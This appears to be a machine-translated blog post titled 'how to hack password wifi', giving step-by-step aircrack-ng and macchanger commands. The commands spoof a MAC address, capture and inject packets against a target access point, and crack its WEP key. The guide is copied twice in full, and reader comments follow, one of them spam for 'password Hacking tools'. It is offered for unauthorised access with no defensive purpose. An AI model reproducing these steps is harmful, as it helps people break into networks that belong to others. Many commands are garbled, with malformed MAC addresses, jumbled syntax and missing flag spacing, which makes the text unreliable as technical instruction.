how to hack password wifi
1) open a terminal and type
1.1) sudo apt-get install macchanger
(Ignore if already installed)
enter the password (the waiting process is complete)
1.2) sudo apt-get install aircrack-ng (ignore if already installed)
(Wait for the process is complete)
1.3) exit
1.4) and then disconnect wifi in-advance
2) open the terminal again and type
2.1) sudo-ng stop wlan0 airmon
(Will appear interface specifications, chipset, driver)
2.2) sudo ifconfig wlan0 down
(Will not show anything)
2.3) sudo macchanger - mac 00:11:22:3344:55: wlan0
2.4) sudo airmon-ng start wlan0
(Will appear interface specifications, chipset, driver)
2.5) sudo airodump-ng wlan0
(Displayed BSSID PWR Beacons # Data, # / s CH etc.)
2.6) to be used coffee BSSID
(Eg 00:14:7 F: 99:54: AE blocked then right click copy)
3) open the terminal again, the terminal 2 does not have to be closed, and then type
3.1) sudo airodump-ng-c 7-w wifi - BSSID 00:14:7 F: 99:54: AE wlan0
(Information:
7 is a channel that is used can be seen in the list CH
00:14:7 F: 99:54: AE BSSID used)
(Enter password)
(Will appear BSSID PWR Beacons # Data, # / s CH etc.)
4) open the terminal again, the terminal 3 does not have to be closed, and then type
4.1) sudo aireplay-ng -1 0-a 00:14:7 F: 99:54: AE-h 00:11:22:33:44:55 mon0
(Type the password>> will appear list-list contains a description)
4.2) sudo aireplay-ng -3-b 00:14:7 F: 99:54: AE-h 00:11:22:33:44:55 wlan0
(Will appear packets and usually this process takes yanglama)
5) open the terminal again, the terminal 4 does not have to be closed, and then type
5.1) aircrack-ng-b 00:14:7 F: 99:54: AE wifi-01.cap
(Open wifi-01.cap and wait for the process is complete)
(Then no writing fond key:>> that's the password)
6) then try these wireless as usual and enter passwornya.
hooray .... connected connection ...........
Do not forget to visit http://hackhaha.blogspot.com yes. Wait for another article.
each laptop is different how to use them.
o yes, I'm here using ubuntu 10:04.
I've tried to use linuxmint10/ubuntu10.10 but hard for mercy (perhaps can not).
and even when wearing linuxmint10 mon0 stuck on channel 1.
many of my
thanks
Signed
http://hackhaha.blogspot.com
o yes, if there is more to know about aircrack-ng koment under yes.
koment you very helpful + added knowledge.
1) open a terminal and type
1.1) sudo apt-get install macchanger
(Ignore if already installed)
enter the password (the waiting process is complete)
1.2) sudo apt-get install aircrack-ng (ignore if already installed)
(Wait for the process is complete)
1.3) exit
1.4) and then disconnect wifi in-advance
2) open the terminal again and type
2.1) sudo-ng stop wlan0 airmon
(Will appear interface specifications, chipset, driver)
2.2) sudo ifconfig wlan0 down
(Will not show anything)
2.3) sudo macchanger - mac 00:11:22:3344:55: wlan0
2.4) sudo airmon-ng start wlan0
(Will appear interface specifications, chipset, driver)
2.5) sudo airodump-ng wlan0
(Displayed BSSID PWR Beacons # Data, # / s CH etc.)
2.6) to be used coffee BSSID
(Eg 00:14:7 F: 99:54: AE blocked then right click copy)
3) open the terminal again, the terminal 2 does not have to be closed, and then type
3.1) sudo airodump-ng-c 7-w wifi - BSSID 00:14:7 F: 99:54: AE wlan0
(Information:
7 is a channel that is used can be seen in the list CH
00:14:7 F: 99:54: AE BSSID used)
(Enter password)
(Will appear BSSID PWR Beacons # Data, # / s CH etc.)
4) open the terminal again, the terminal 3 does not have to be closed, and then type
4.1) sudo aireplay-ng -1 0-a 00:14:7 F: 99:54: AE-h 00:11:22:33:44:55 mon0
(Type the password>> will appear list-list contains a description)
4.2) sudo aireplay-ng -3-b 00:14:7 F: 99:54: AE-h 00:11:22:33:44:55 wlan0
(Will appear packets and usually this process takes yanglama)
5) open the terminal again, the terminal 4 does not have to be closed, and then type
5.1) aircrack-ng-b 00:14:7 F: 99:54: AE wifi-01.cap
(Open wifi-01.cap and wait for the process is complete)
(Then no writing fond key:>> that's the password)
6) then try these wireless as usual and enter passwornya.
hooray .... connected connection ...........
Do not forget to visit http://hackhaha.blogspot.com yes. Wait for another article.
each laptop is different how to use them.
o yes, I'm here using ubuntu 10:04.
I've tried to use linuxmint10/ubuntu10.10 but hard for mercy (perhaps can not).
and even when wearing linuxmint10 mon0 stuck on channel 1.
many of my
thanks
Signed
http://hackhaha.blogspot.com
o yes, if there is more to know about aircrack-ng koment under yes.
koment you very helpful + added knowledge.
4 comments:
password Hacking tools,Free download here
anytinkz.blogspot.com
Enjoy!
does this work on macbook??
Hah, :| this way is SO easy. I am a major hacker myself, and this is nothing. x( This is an insult to hackers.
e di kaw nga!!!
Post a Comment